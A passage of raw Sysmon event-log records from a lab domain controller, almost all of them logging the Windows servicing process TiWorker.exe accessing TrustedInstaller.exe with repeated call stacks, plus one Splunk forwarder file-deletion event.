12:02:26.259{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.259{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.259{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.243{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.243{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.243{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.243{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.243{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.243{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000006175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.243{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08FA66DF045F433B259D417528BAE77F,SHA256=3B8FCA0C90131D6768E5B9539D970CF25760F5F2F92724A704CD7FC01948B1BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.228{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.228{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.228{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.228{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.228{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.228{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.212{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.212{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.212{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCR